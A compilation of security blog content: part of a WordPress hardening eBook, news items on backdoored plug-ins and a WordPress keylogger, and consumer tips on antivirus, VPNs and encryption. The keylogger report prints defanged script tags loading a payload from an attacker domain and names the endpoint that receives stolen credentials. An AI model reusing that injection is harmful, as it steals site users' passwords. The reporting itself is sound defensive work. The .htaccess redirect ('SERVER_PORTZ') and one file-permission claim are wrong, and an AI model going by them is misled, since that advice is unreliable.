
Adding External Monitoring Systems

Monitoring systems, firewalls, and scanners can all be used to protect your website from intrusion attempts. Popular options include Cloudflare and Sucuri, and some web hosts also provide their own utilities. These solutions are designed to detect, identify, and mitigate threats. They can recognize potentially suspicious traffic and deny it — while still keeping a website up and active.

External monitoring systems are particularly useful against DDoS attacks. A monitoring system will be able to identify a DDoS attack and will be able to deny all illegitimate requests while still allowing ordinary traffic to flow through. External monitoring systems can also be used to detect and reject potentially unsecured connections.

What’s a DDoS? In a distributed denial of service attack, a cyber-attacker uses multiple devices to continually create connections to a target. Eventually the target — in this case your WordPress site — becomes so inundated with requests that it can no longer respond, even to legitimate ones. This is one of the easiest and fastest ways to take a website down.​

Cloudflare is a particularly useful tool for WordPress bloggers. Not only does it protect against DDoS attempts and detect potentially malicious traffic, but it operates primarily as a Content Delivery Network. A CDN speeds up a website by caching its data; users will be able to access the website much faster and there will be less load distributed to the server. Cloudflare is also completely free and can manage multiple sites at once, additionally providing analytic data through which you can measure your website’s traffic and performance.

Setup an SSL Certificate and Configure WordPress

SSL certificates can get a little technical — all you really need to know is that using an SSL certificate means that your data is going to be encrypted. And that means that people who are seeing your data being transmitted won’t be able to read it. Many websites you use probably use an SSL certificate. You can usually tell because there will be a “locked” icon by the URL and the URL will start with “https://” rather than “http://.”

Not all hosting accounts will come with an SSL certificate. You may need to purchase one through your web host as an add-on — or you may need to use a security plug-in that comes with one, such as Sucuri. Your web hosting service will be able to install the SSL certificate on your account but, either way, you’ll need to configure WordPress to use SSL.

How to Add SSL and HTTPS to WordPress

Click on your “General” settings in your administrative dashboard.

Change your WordPress and Site Address URLs to “https” rather than “http”.​

If you have already added content to your WordPress site, you may also need to include a redirect. For this, you will need to browse to the main directory of your web host. This is usually called “htdocs,” but may also be your website’s name. Here you will want to modify a file called “.htaccess” to include the following text:

RewriteEngine On

RewriteCond %{SERVER_PORTZ} 80

RewriteRule ^(.*)$ https://www.[blog].com/$1 [R,L]

In the above example, [blog] will be the domain of your blog. This will redirect any requests to “http” to “https” automatically.​

Update Your File Permissions

File permissions tell your web server who is allowed to view and access each of your website’s files. By default, WordPress is often installed with “777” permissions for its directories. Though FTP, you can select these directories, right click, and change these permissions to either “750” or “755.” While everyone will be able to edit these files, modifying them and deleting them will require additional permissions.

Your wp-config.php file should be set to “600,” and the files within your WordPress directories should be set to “640” or “644.” These permissions will still let you do anything you need to do; it will simply reduce the chances that someone else could alter or delete your files.

Turn Off PHP Error Reporting​

By default, many servers wil lsend out an error message if PHP code fails — and WordPress is written in PHP. These errors are designed to help developers when they are debugging, but because they can expose parts of your website’s code, they can also be a substantial security risk. To address this, you need to turn off PHP error reporting. In the event that PHP does encounter an error, it will simply send a blank page.

This requires a modification of your wp-config.php file, which can be found via FTP (or a file browser) in the base directory of your WordPress installation. At the top of wp-config.php, below the first line, you should put:

error_reporting(0);

@ini_set(‘display_errors’,0);

Of course, this also means that you aren’t going to know what specifically failed in the event that your website does fail — and, in that situation, you might need to temporarily toggle errors back on.​


Chapter Five: Protecting Against Your Users

Bloggers often run in packs. If you’re running a blog that has multiple contributors, then your greatest threat might not be from the outside — it may actually be your own users. Users tend to make mistakes; in fact, when businesses are hacked, it’s almost always internal. 52% of cyber attacks occur due to system failures or human error.

The Importance of Restricting Permissions

In security, there are things that are called “best practices.” These are the things that we do in an ideal world to create the lowest risk environment. One of the most important security best practices is to restrict user permissions to only what they truly need to complete their day-to-day tasks. When you do not restrict permissions appropriately, you run the risk that:

  • A single user could cause substantial damage — either intentionally or accidentally. There is no reason for a contributor to be able to delete another contributor’s posts, but they might start to do so if they think those posts were inappropriately filed under “their account.”
  • A single user login breach could become more dangerous. If a malicious user gets into a contributor’s account, they are fairly limited in the amount of damage they can do. If a malicious user gets into an administrator’s account, there’s far more potential for damage. The fewer users there are with administrative powers, the better.

It’s also a good practice not to assign temporary permissions — i.e., not to make a user an administrator for a temporary amount of time to make some adjustments. Though this is commonly done to make a job simpler, it can easily be forgotten later on.

Setting Password Restrictions

Thanks to Chapter Two, you now know how to set a good password. But that doesn’t necessarily mean that your users do. When left to their own devices, users could set very simple passwords that will easily be cracked — and that compromises your entire system. To avoid this, you can set up restrictions regarding the passwords that your users can set.

The most important factor you want to look at is length, but you also want a decent variety of characters in addition to alphanumeric ones. You may want to request at least one number (0-9) and at least one special character (_;,/`~*). Keep in mind that very restrictive password combinations actually tend to work against you rather than for you, as users will be more likely to create passwords that are difficult to remember. Difficult to remember passwords will need to be either written down or reset.​

By default, WordPress core ensures that users have “strong” passwords and tests passwords for its complexity. If you have a current version of WordPress, you may not need to worry about this. But if you need to add this functionality, you can use a plug-in such as Force Strong Passwords.​

Managing User Sign-Ups New users should always be restricted to a “contributor” status, and for the best security, they should have to be manually approved. Letting users create their own accounts can be dangerous otherwise!​

​Log Out Idle Users​

Users sometimes forget that they’ve logged into their account. When they do this, they expose the blog to tremendous risk — anyone who is on the same computer and wants to tamper with your website can. To deal with this, you can install a plug-in that will automatically log users out after they’ve been idle for a certain amount of time.

The most popular way to do this is through the Idle User Logout Plugin. This plug-in lets you select which roles will idle and how long it will take them to log out when idle. Users won’t lose their data; they’ll simply need to login again before they can continue making adjustments.​


Chapter Six: Protecting Against Third-Party Utilities and Services

There are two third-party threats that you need to be most conscientious of: third-party plug-ins and third-party advertising networks. Both of these can add content and programming to your website that could either damage your site or harm your users.

Validating Third-Party Plug-Ins​

Plug-ins for WordPress are generally guaranteed to be malware free; otherwise they would not be included within the WordPress repository. However, that is not the major concern — the major concern is that these plug-ins may not be as secure as they should be. Anyone can write and publish a plug-in, including an inexperienced developer who could potentially create a plug-in with security vulnerabilities. If part of your website is vulnerable, all of your website is vulnerable.

Before installing a third-party plug-in, you should ask yourself the following questions:

  • How many reviews does it have and how highly is it rated? You should avoid plug-ins that appear to have been barely used or that have just been published for the first time; they could have security issues that have not ye been discovered.​
  • How polished is the plug-in and its documentation? The more documentation a plug-in has, the better — that means the developer is being conscientious and mindful of its design. Likewise, a plug-in that is visually polished will likely have been produced by someone who is detail-oriented.
  • How many other plug-ins has the developer released? The more experienced the developer is with WordPress, the more likely they are to produce solid, secured plug-ins for the platform. If they haven’t released any other plug-ins, they may not be aware of WordPress’s unique security environment.

Avoiding Malicious Third-Party Services

The most common type of malicious third-party service has to do with “malvertising.” Malvertising refers to advertisements that actually contain malicious code. Many bloggers fund their blogs through the use of third-party ads. Malvertising targets the users rather than the owner of the blog themselves, but it can also get a blog blacklisted if the malicious code is detected on their site. There are a few ways to avoid these products:

  • Only use popular services. Google Adsense and Bing Ads are two of the most popular networks, but that doesn’t mean they don’t ever contain malicious code — it just means they are less risky.​
  • Invest in a monitoring solution. As noted, even popular third-party network can be infested, especially if the malicious attacker is using a previously unknown vulnerability. A monitoring solution will identify malicious code when it is run on your site, rather than trusting the service to detect it.
  • React quickly to potential threats. If you do suspect that malicious code is being run on your site, it’s important to address it immediately — even if that means taking down your advertising while you figure the situation out. Otherwise you can lose traffic and damage your website’s reputation.

Identifying Potentially Harmful Plug-Ins or Themes

The Internet is a vast and wide place, and sometimes when looking for plug-ins or themes you can be directed to individual websites or repositories that promise some of the most popular WordPress tools. But whenever you are promised something for free, it’s likely that there’s a catch. In the case of plug-ins or themes, the catch is often a virus.

When purchasing a premium plug-in or theme, it is important to go through the WordPress.org repository or a trusted corporate site. There are many websites that promise premium plug-ins or themes for free. These assets have been stolen — and even if they don’t include malicious code, it still won’t be legal to use them.​

Only Installing the Plug-Ins You Need

Though plug-ins can add some fantastic functionality, they may not always be strictly necessary for the operation of your blog. Think critically about each plug-in that you install; each one isn’t just a security risk, but will also consume the overhead of your website and ultimately slow it down.


Chapter Seven: Computers, Connections, and the Internet of Things

Consider an encrypted, password-protected hard drive, and a thief who wants the data that is held within it. It would take days or weeks for the thief to hack into the hard drive — and the thief only has a few minutes of time. What does the thief do?

The thief picks up the hard drive and walks away with it.

Protecting Your Blog Against Physical Intrusion​

Today we have smartphones, tablets, and laptops, all connected to the Internet and connected to your blog. Losing any one of those items could mean compromising your blog, unless you make sure that you’ve taken the appropriate steps to protect yourself. These are:

  • Always make sure that your devices are secured. All of your devices should be protected by either a PIN or a password — and, where applicable, you should use two-factor authentication such as a fingerprint reader or an ocular scanner. Your devices should automatically lock after a certain amount of time, so that they will password protect themselves when they are idled.
  • Don’t use public computers to access your blog. You never know what could be on a public computer and you can never be too cautious. If login information is stored on that computer, someone could use that computer to log in as you. Likewise, you shouldn’t log into your email account either — because it could contain information that could be used to access your blog.
  • Never access your blog through public WiFi. A public WiFi connection can be run by anyone… including people who are trying to look at your data or insert malicious code into your data transfers. SSL largely helps with this by encrypting your website’s traffic, but there can still be potential vulnerabilities related to a public WiFi connection.

Chapter Eight: Constructing Your Disaster Preparedness Plan

It’s the blogger’s worst nightmare: what happens when your site goes down? Do you know where your backups are? How quickly can you deploy them? And how current are they? In order to avoid downtime, you have to be able to answer these questions quickly and reliably.

What is a Disaster Preparedness Plan?​

A disaster preparedness plan outlines the steps that you need to take to get your website up and running again after it has been taken down. And your website could go down for any reason: your blog could be hacked, your hosting provider could go out of business, or you could even make a mistake leading to data loss.

At its most fundamental, a disaster preparedness plan usually involves backup solutions and how to re-deploy your blog’s data. But a disaster preparedness plan might also include failover services, such as the ability to redirect your traffic somewhere else while you are down, or the ability to notify your readers that there may be problems.

In general, it’s a good idea to:​

  1. Have a temporary page in place that will tell your readers that your website is down and that it is expected to be back up by a certain time.
  2. Know where to find your current backups and how to restore them as quickly as possible.

Be able to start and restart services that your website depends upon, such as your web service or your database.

The Four Best Practices for Website Backups​

  1. Backups should be automatic. Don’t rely upon manual backups; there will come a time when you’ll forget. Schedule your backups to run during the lowest traffic hours of your website (as they do consume some system resources), and make sure that they are running as scheduled. Don’t forget to check on them frequently; they could fail if they run out of storage space.
  2. Backups should be incremental. You should always have monthly, weekly, and daily backups to fall back on. You never know when an intrusion could occur — or when data could be lost. It’s very possible that you might find yourself having to go back several days or even several weeks to completely restore your site.
  3. Backups should be redundant. Never store your backups only in one place. Cloud backup solutions are especially useful because they are naturally redundant… but what happens if you lose access to the service provider? Ideally, you should have backups both through your web host and through a secondary service.
  4. Backups should be elsewhere. Your backups shouldn’t only be stored on your host; that’s a recipe for disaster if your hosting account itself is hacked. Likewise, you don’t want your backups to only be on a local or external drive — what happens if that drive crashes?

Options for Backing Up Your WordPress Site

  • Your web hosting service. Most web hosting services offer their own backup system, which should be used as a secondary backup option. But don’t assume that your web host automatically does it. Notably, VPS systems (virtual private servers) usually leave it to you to install a backup solution manually.
  • A cloud-based backup solution. There are subscription-based backup solutions that are located on the cloud, which can take backups automatically from your system. WordPress offers cloud-based backups through its WordPress Security plug-in.
  • As a feature in comprehensive security plug-ins. Security plug-ins often include the ability to manage your backups, as this is a part of managing security and mitigating potential risks. Sucuri has a particularly comprehensive backup and restoration system.

An ideal backup solution will backup your website both on your website host and on a cloud solution. This gives you multiple options to recover your data and allows for almost immediate re-deployment of your site should data be lost or corrupted.


Chapter Nine: Managing and Monitoring Your WordPress Site

Your job isn’t over once you’ve configured your website and installed your tools. Your WordPress site will also need to be managed, monitored, and maintained over time. If you want to keep your website secure, you’ll need to update it regularly and defend against new and technologically-advanced threats.

Keeping Your WordPress Site Current

You may have noticed that WordPress updates itself quite frequently. These updates concern more than just functionality and improved workflow — they also address new and emerging security threats. Updating your WordPress site frequently is critical to maintaining a healthy security ecosystem.

Some security plug-ins, such as Sucuri, will routinely check to make sure that you are running the current version of WordPress. And though hiding your WordPress version can protect you from some threats, other more persistent cyber criminals may not be fooled.

Abandoning Out-of-Date Plug-Ins​

WordPress tracks which plug-ins have been frequently updated and which plug-ins have not been tested with current versions. Plug-ins that are not kept current should be replaced with plug-ins that are, even if the newer plug-ins might not offer the same functionality.

Older plug-ins will have the same issues as older WordPress installations; they could contain vulnerabilities that have been identified. Once a vulnerability has been identified in an older system, all a cyber-criminal has to do is look for a blog that’s still using that old system.

Keeping Your Site Clean​

Websites evolve. Over time you’ll add and remove content, install and uninstall plug-ins, and change themes. Keeping your site clean is a matter of deleting anything that you aren’t using right now: inactive plug-ins, old themes, and other unnecessary content.

Not only are these inactive items taking up space and other resources, but they could actually still represent a security risk even if they have already been deactivated. Plug-ins, in particular, need to be completely deleted in order to remove their risk. Otherwise they will still be on your server and their scripts can still be used.​


Conclusion

Though it may seem that securing WordPress is difficult, it’s really just a matter of being thorough and vigilant. “Hardening” WordPress does require that you go through certain configuration steps — and that you install security-related plug-ins. But once you have properly secured your WordPress installation, it should mostly be able to take care of itself. Moving forward, your blog will be able to protect itself… and you’ll know what to do if it ever cannot.

Security plug-ins such as Sucuri and Wordfence can take a substantial amount of burden off of you as the blog owner. Both Wordfence and Sucuri will commit many of the above mentioned configuration changes on their own — and will be able to monitor and manage your website 24/7. By automating parts of your WordPress security, you’ll both be able to improve upon its accuracy and reduce the amount of time you need to spend on site administration.

There are countless threats out there — and there are many reasons why a malicious attacker might target a WordPress site. With cyber criminals rapidly becoming more persistent and threatening, it becomes necessary for bloggers to be proactive about their security solutions. A proactive blogger will be able to protect their blog’s data against even some of the most advanced threats.

Through this eBook you will have hopefully learned all of the information that you needed to learn about hardening WordPress — but the world of security is also always changing. If you want to make sure that your site is secured into the future as well, you will need to remain current on modern security threats and solutions. The job of a blogger is never over as far as website maintenance and security is concerned.

But by properly securing your website, you’ll be able to build traffic faster, develop a solid reputation, and sidestep many of the costly issues associated with having a website taken down or otherwise compromised. Securing your website is one of the first steps towards developing a solid blog that will be able to steadily grow in popularity. A secured blog will have minimal downtime and will be able to serve its user base both better and more consistently.

That’s it.

Malicious Backdoored plugins with More than 89,000 Active Installs found in WordPress Repository

Malicious Backdoored plugins with More than 89,000 Active Installs found in WordPress Repository

WordPress has such a massive ecosystem consist of a number of plugins and themes, threat actors involved in various malicious activities such as hiding the PHP backdoor scripts into the WordPress Security Plugin.

In this incident, the attackers sell existing unsupported plugins to new authors with backdoor code inserted and their goal is to insert SEO spam to the sites with the plugin installed.

Wordfence uncovers the incident and WordPress security team has closed the plugin from the store which means the plugin not available to download from the repository.

 

Malicious WordPress backdoor Plugins

Duplicate Page and Post

The Functionality of the plugin is to create a cloned post or the page, now the Current Owner of the plugin inserted backdoor scripts which makes a request to cloud-wp.org and injects cloaked backlinks to the site.

It has more than 50,000+ Active Installs and the plugins Removed from WordPress.org on December 14, 2017.

No Follow All External Links

Behaviour same as like Duplicate Page and Post this backdoor requests to cloud.wpserve.org and returns content based URLs and the backdoor used in injecting backlinks for SEO.

It has more than 9,000++ Active Installs and the plugins Removed from WordPress.org on December 19, 2017.

WP No External Links

It is same as the previous two backdoors it requests wpconnect.org and returns content based on the URL and the backdoor used in injecting backlinks for SEO.

It has more than 30,000+ Active Installs and the plugins Removed from WordPress.org on December 22, 2017.

Wordfence says Orb Online, paid for both the No Follow External Links and Duplicate Page and Posts plugins and the same threat actor involved in purchasing and injecting backdoors to all three of these plugins with the goal of injecting SEO spam into the thousands of websites running the plugins.

If you have the plugin installed it is highly recommended to uninstall them immediately and scan the website for infection with sucuri and gravity scan.

Thousands of WordPress websites get hacked every day, so securing your blog must be top of mind. Luckily, it’s not all rocket-science as you need to make most of the tweaks only once.

Keylogger Discovered in more than 5,000 WordPress Websites

Keylogger Discovered in more than 5,000 WordPress Websites

New research revealed that more than 5,000 WordPress websites are running along with keylogger and also it’s trying to running crypto-miner in the browser while browsing the infected website.

Recent days WordPress websites displaying unwanted banners at the bottom of the page which appears 15 seconds after browsing the website due to injecting  the Cloudflare[.]solutions Scripts in function.php. that does not belong to Cloudflare.

<script type='text/javascript' src='hxxp://cloudflare[.]solutions/ajax/libs/reconnecting-websocket/1.0.0/reconnecting-websocket.js'></script>

<script type='text/javascript' src='hxxp://cloudflare[.]solutions/ajax/libs/cors/cors.js'></script>

It used to load this malicious script every time admin pannel logged in both front end and backend.

In this case, the second  script contains cors.js which is injected in an encoded format and once it decoded we can see that there are a two cdnjs.cloudflare.com URLs with long hexadecimal parameters:

A domain name seems to be original Cloudfare URL but when we come down analyzing the https://cdnjs.cloudflare.com/ajax/libs/linter/linter.js ,it contains linterkey variables.

Further, analyze revealed that linter.js contains a real Payload in hexadecimal numbers after the question mark in the URLs.

According to sucuri, This script adds a handler to every input field on the websites to send its value to the attacker (wss://cloudflare[.]solutions:8085/) when a user leaves that field.

This Payload has capable of performing the keylogging activities each and every time admin logging on their WordPress website.

Here using this WordPress Keylogger, both the username and the password were sent to the cloudflare[.]solutions server even before a user clicks on the “Login” button.

The Same portion of this first attack and the second attack took place in April and November month and this is the latest scenario that is capable these stately keylogging futures.

The worst part is if this flow has successfully executed in e-commerce based WordPress website then the hacker can able to access the payment related information.

Mitigation steps for this WordPress Keylogger

  • Performing the Proper Pentesing for WordPress Website – Pentesting Checklist
  • As we already mentioned, the malicious code resides in the function.php file of the WordPress theme. You should remove the add_js_scripts function and all the add_action clauses that mention add_js_scripts.
  • Given the keylogger functionality of this malware, you should consider all WordPress passwords compromised so the next mandatory step of the cleanup is changing the passwords (actually it is highly recommended after any site hack).
  • Don’t forget to check your site for other infections too. Many sites with the Cloudflare.solutions malware also have injected coinhive cryptocurrency miner scripts.
6 Ways to Protect Yourself on the Internet

6 Ways to Protect Yourself on the Internet

  • Whether you are an employee, owner, or a home worker, your work will certainly involve the internet. However, while the digital world offers a wide range of tools to boost productivity, it is also a hotbed for malware and fraud tools designed to steal your information.

    Wondering how you can stay safe while online? Read on for 6 must-know tips every savvy netizen should know.

    1. Keep your antivirus updated

    In simple terms, an antivirus works by scanning your machine for malware and helping you restrict its spread.

    Unfortunately, malware is constantly evolving. As these internet nasties grow in number and sophistication, the best defense is to frequently update your antivirus.

    By updating your antivirus, you make sure your system is up-to-speed with newly identified viruses and equipped with the latest tools to remove them.

    2. Hide your IP address

    If you don’t like stalkers knowing where you are physically, chances are you don’t want snoops knowing where you are (or what you’re doing) online.

    Whether you want to access social media while abroad, watch the latest sports online, or just want to conceal your internet activity from your ISP, you can’t go wrong by making a habit of hiding your IP.

    There are many ways to hide your IP address. The safest and most reliable to do this is to use a VPN (more on this later).

    3. Use a strong password

    If you’re still use “Password” as your password in 2017, you should probably stop using the internet (for your own good). Your passwords are like the keys to your apartment. Don’t settle for one that any stranger can guess and replicate.

    There are many techniques for building strong passwords, such as mixing in a variety of letters, numbers, and symbols to using two-factor authentication for additional security. Another avenue to consider is using a password generator to create passwords that cannot be easily cracked via brute force hacking. You may also want to use a password manager to help you store your passwords.

    4. Don’t access confidential information on public networks and machines

    With the prevalence of Wi-Fi, it’s often a temptation to connect to a public network while traveling or working on the go. The same can often be said for using public computers in libraries and airports.

    While it’s not a problem to use public machines and networks for non-private matters, it would be a very bad idea to log into your social media, bank, or work accounts while on these machines/networks. A bugged machine may have keyloggers installed to track what you type, while a rogue network may capture your data and send it to nefarious individuals while injecting malware into your own device.

    5. Beware of cookies

    Cookies were designed to help websites remember visitors, allowing them to provide a more personalized experience to each user. However, they can also be abused to track your online activity and to send you targeted advertisements.

    To protect yourself from malicious cookies, remember to delete any cookies after each browsing session. You can also use a private web browser such as Tor.

    6. Use a VPN

    A VPN is a swiss-army knife for online safety. It hides your IP address (as mentioned above), anonymizes the data you send into the internet, and can even let you access geolocation-specific discounts and content.

    That said, be careful when choosing a VPN provider. Make sure the provider offers a wide range of locations, does not keep user-identifying logs, and is not a free VPN service. Maintaining high quality VPN servers is not a cheap proposition, and if they’re not charging you for it, they’re almost certainly making money by selling your activity to a third party somewhere else.

    The internet remains a wonderful place for productivity, entertainment, and innovation. However, many dangers await the unwary. Remember to follow these practices, exercise common sense whenever you’re unsure, and you’ll be able to enjoy the best of the internet without worry.

Best Antivirus 2017

Best Antivirus 2017

Do you need an antivirus program?

In a nutshell: yes.

Back in the early days of computing, viruses and other forms of malware were relatively rare.

Often coded by lone wolves intent on having ‘fun’ or creating a small amount of frustration among the early adopters, the creation of new malicious code was so low-key that the early security companies would only send out updates to their programs on floppy disk every few months.

Subscribers could sleep well at night, safe in the knowledge that their PCs were highly unlikely to become infected with anything nasty.

Fast forward to the end of last year and the threat landscape now looks altogether different.

As The Register reported in September 2014, the number of new malware samples released every day is quite staggering: 227,747, equivalent to 158 new threats per minute.

Even more interesting is the fact that only 9% of new threats in the third quarter of 2014 were viruses – the vast majority (75%) of new malicious code being written today is trojans which are typically designed to steal banking logins and other sensitive information.

Your best defence against the threat posed by trojans, worms, viruses and rootkits is to have security software installed on all your machines, especially those that are connected to the internet – as most are these days.

By installing an antivirus program, you will greatly improve your chances of detecting and neutralising those threats.

While no AV program offers a ‘magic bullet,’ they are a critical first step in securing your device.

Is-Windows-Defender-good-en

Do the free tools baked into recent editions of Windows offer sufficient protection?

Microsoft has, for some time now, offered free security tools to owners of its Windows operating system, either through the downloadable Microsoft Security Essentials or through Windows Defender which can be found bundled with Windows 8, 8.1 and now 10.

While both are free, compact, easy to use and offer some level of protection, independent testing labs, such as AV-Comparatives, have often concluded that their effectiveness is quite limited.

Therefore our advice is to avoid Microsoft’s baked in security and look instead to some of the many alternatives.

Are free antivirus programs good enough?

Not all antivirus programs are created equal and many attempt to differentiate themselves from the competition either via the additional features they offer or by price.

As we believe in offering you an informed choice, our reviews look at both paid and free security software.

While free AV programs could be right for you – free is free after all, and your needs may be fairly modest – they do tend to skimp on the list of features they offer, or the amount or cost of the support they come with.

Our antivirus reviews will evaluate just what you will get from a free antivirus program and assess whether that offers better value for your needs versus a paid alternative.

Does a standalone antivirus program offer enough protection or should you pair it up with a firewall, or go for a full internet security suite?

Such an important question is not one we can answer on your behalf – the answer lies in how you use your computer, laptop or other device.

If you are an occasional surfer who never visits any websites that could be deemed as questionable then you will still need some security in order to protect yourself from the possibility of accidentally visiting an otherwise legitimate site that has been hacked and injected with malware.

You will also need to think about the risk of installing malware from borrowed CDs, DVDs and USB sticks, as well as the threat posed by malicious email attachments.

Overall though, a small, free antivirus program may serve your needs well enough.

On the other hand, heavy surfers, those of you banking online, or making web purchases with your credit cards, will probably appreciate the extra protection afforded by having additional security features in your arsenal.

If this sounds like you, we would definitely recommend a firewall and anti-spyware as a minimum starting point and would also suggest that you may wish to look into full internet security suites which often cost just a little more than an antivirus program but offer all these features and many more besides.

 

Does paying for your antivirus program guarantee that you’ll receive adequate support from the vendor?

In a nutshell: no.

Our experience of antivirus vendors tells us that customer support is not always proportional to the price you pay for the product.

While it is certainly true that the companies offering free AV products tend to offer less support in the first place, it is also true that handing over your hard earned cash may not earn you the right to rely upon 24/7 support via phone or email.

Our reviews will give you a good idea of both the level of support you should expect to receive with any given product, and the ease with which you can expect to call upon it when required.

Will your antivirus program of choice give you the level of protection that you need?

That is, of course, the million dollar question.

While there are many factors to consider when choosing an antivirus program, including:

  • Ease of use
  • Level and availability of support
  • Minimum system requirements
  • Additional features, such as anti-spyware, online banking protection, firewalls, social media plugins, phishing protection and more

The most important consideration for most of you will be whether or not it can get the main job done – protecting your computing device from the numerous threats it could face as you traverse the internet.

With that in mind, our antivirus reviews will take a close look at just how effective each program is.

Own an older machine? Will your antivirus program even work and, if so, will it render your computer unusable for anything else while running a scan?

As technology marches on at what appears to be an ever-increasing pace it’s easy to forget that not everyone has the latest processors or the fastest solid state drives in their desktop PCs.

And why should they?

Unless you are gaming (and if you are, you may want to read our reviews to see how your preferred antivirus program deals with that situation) or editing videos, then much older machines are still perfectly adequate for the majority of tasks.

Email, word processing, web surfing and online banking are all quite possible on PCs manufactured in the last decade.

But how old is too old for the latest antivirus protection?

Well, the good news is that the vast majority of security software will run on very low spec machines so the minimum system requirements may not be an issue for you.

But you will want to check, just to be certain.

There’s nothing worse that a program that doesn’t work, or one that slows your machine to a total standstill when you have work to do, is there?

Read our reviews!

So, which antivirus program is the right one for you and your family?

The simple answer is that there is no simple answer – everyone’s needs are different and, for the most part, there certainly isn’t a wrong choice (the major vendors’ products may vary in effectiveness and usefulness but they all get the job done to some degree or another).

That’s why picking the right one for you can be so damned hard.

While some people will fall back on the strangest of reasons for purchasing a particular product – yes, some of those boxes do look nice and, yes, it can be convenient to stick with the antivirus program that came with your computer, the truth is that your decision deserves a greater level of consideration than that.

If you want a program that will give you the level of protection you need and deserve then you need to pick one that suits you as an individual, that works hand in hand with the type of computing you do, and that isn’t too demanding for the machine you are installing it on.

You’ll also want a program that’s easy to use and value for money – after all, why pay if a free version is good enough?

Equally, why go cheap if a far better level of protection can be had inexpensively?

If you need help walking through this minefield then trust in us – we’ve reviewed all the best antivirus programs and our expert reviews will tell you everything you need to know before picking the right software to match your needs.

4 Reasons Encryption Is An Entrepreneur’s Best Friend

4 Reasons Encryption Is An Entrepreneur’s Best Friend

  • If you’re an entrepreneur and you use public Wi-Fi, you’re an easy target for hackers looking for data to steal. Public Wi-Fi today is usually unencrypted, which means it’s open season for hackers.

    Encryption is vital to your privacy and data security, which translates to maintaining your business without having your bank accounts and proprietary information stolen.

    Encryption in a nutshell

    Encryption transforms data into an unreadable form that can only be decrypted by a special key. An encrypted file, when opened, will look like gibberish until it’s properly decrypted.

    If you haven’t given genuine consideration to encrypting your data, here are 4 reasons you should:

    1. If you use public Wi-Fi, your data is at risk

    When your Wi-Fi network is password protected, that password protects the websites you visit from being discovered by other people. Without a password, hackers can access the websites you visit, along with anything you type into unencrypted web forms.

    Public-Wi-Fi has never been completely secure, although in years past it was commonly protected by a temporary password that would only be provided with a purchase. This type of protection made it harder for hackers to gain access to information being sent across the network.

    You can’t control whether or not public Wi-Fi is encrypted, but you can take your own precautions to protect yourself like using a VPN to route your traffic through an encrypted server. While a VPN isn’t a guaranteed solution, it does decrease your risk of getting hacked.

    2. You can’t rely on encrypted websites

    Just because a website is encrypted doesn’t mean you are automatically protected anytime you visit that site. For example, your bank’s website is probably encrypted, but if you’re using an unencrypted Wi-Fi network to access your bank’s website, your login credentials could easily be stolen as you type them in.

    Hackers can also hijack HTTP connections and create fake HTTPS links that you think are real, allowing a man-in-the-middle attack to intercept what would otherwise be a secure browsing experience.

    If your computer is infected with a keystroke logger, anything you type into your computer will be transmitted to the hacker, even if you’re connected to the most secure network in the world.

    If you’re on an unencrypted network, like the ones at Starbucks, someone could sit in the lobby with a simple tool and hijack your browsing session.

    The only way to prevent this is to keep your data encrypted on your computer, or better yet, don’t use public Wi-Fi networks when conducting your business.

    3. Emails can be hijacked

    Encrypting emails is especially important because that’s where most company communications take place. Credit card numbers and company secrets are commonly exchanged through email, and if anyone is snooping in on your email conversations you can guarantee that information will fall into the wrong hands.

    Some businesses only require employees to encrypt emails they consider to be private, but employees might misjudge what’s considered private. That’s why you should install a program on your company’s email server that encrypts every email, and not allow staff to encrypt selectively.

    4. Not all hotspots are authentic

    Hackers often create fake hotspots to trick people into connecting to what they think is their usual coffee shop Wi-Fi network. For example, they might bring a device into Starbucks and setup a fake hotspot called “Starbucks.” If you’re savvy enough to remember how the real network’s name is spelled, you won’t get caught in this trap.

    Real networks are prone to becoming compromised, though, so even connecting to a genuine hotspot could be dangerous.

    Data encryption isn’t just for top-secret files created by the government. There are real threats out there, and your data in any form should be encrypted at its destination as well as in transit.

Computer Virus Resources: A Big List of Tools and Guides

Computer Virus Resources: A Big List of Tools and Guides

Below you’ll find a handy list of resources that will explain what computer viruses are, how to prevent them, how to get rid of them, and where you can learn more about computer viruses.

Guides About Computer Viruses

If you’re not familiar with computer viruses and what to know more, or you’re wanting to expand your current knowledge, these resources will provide you with in-depth information about them. From how to detect a virus on your computer to what the most common types of viruses are, these guides have all bases covered:

TechTarget.com – To get you started, here’s a handy definition of “computer virus.” You’ll also find some information on the different types of viruses (e.g. macro viruses, file infectors, and overwrite viruses); an intriguing history of computer viruses; and some of the world’s most famous viruses. You might also want to check out their malware guide, which provides you with even more in-depth information.

US-Cert.gov – Produced by the United States Computer Emergency Readiness Team, this information introduces you to viruses and how you can avoid them.

Dummies.com – This resource provides you with the ultimate cheat sheet for tackling computer viruses. It explains how to configure your antivirus software, how to scan for viruses on your computer, and how to operate your computer safely. It also includes a section on what to do if your computer does get a virus and how best to handle this.

LiveScience.com – Discussing the three most common types of computer viruses, this resource delves into trojans, botnets, and scareware. It goes into detail about each of these while also providing you with advice from some industry-leading experts.

Comparitech.com – To tackle computer viruses it’s imperative that you’ve got antivirus software installed on your computer. And this great, jargon-free guide explains why you need antivirus software and what you need to look out for when buying it.

BBC Bitesize – Even though this resource is aimed at kids, it still provides a great overview of what viruses are, what can happen if your computer gets one, and what the most common types of malware are. Perfect for educating the kids on what to look out for when they’re on the computer.

Choosing Tools that Will Protect and Remove Computer Viruses

To help you find the most effective antivirus software for your computer, these resources provide useful advice on what features to look out for:

Comparitech.com – Providing a list of the best antivirus protection for 2017, Comparitech has done all the hard work for you by reviewing each provider in detail. They’ve looked at various criteria, including value for money, effectiveness, and additional features. You can read in-depth reviews on each of these providers before making your purchase.

US-Cert.gov – Here you’ll find some more information about what antivirus software does, how it works, and how it will respond to threats.

SE Labs – Founded by security expert Simon Edwards,  Chairman of the Board of the Anti-Malware Testing Standards Organization, this company provides independent testing of antivirus programs. Consumers can sign-up to receive their latest reports here.

Databases About Viruses

To stay alerted to potential threats, you may want to check on these databases which provide the latest real-time updates on existing and emerging threats and vulnerabilities:

WildList.org – WildList Organization International aim to provide comprehensive, timely, and accurate information to product developers and users about computer viruses that are “in the wild.” The list is produced by over 40 recognized volunteers and is free for all to view.

Symantec.com – As a leader in cyber security, this is a great place to visit if you want to hear about the latest threats. You can find up-to-date information about emerging threats, emerging risks, and vulnerabilities.

McAfee.com – On this website you’ll find a list of recent threats, which have been assessed to establish what type of risk they are (i.e. low or high). You can also find a global virus map and a list of recent virus hoaxes.

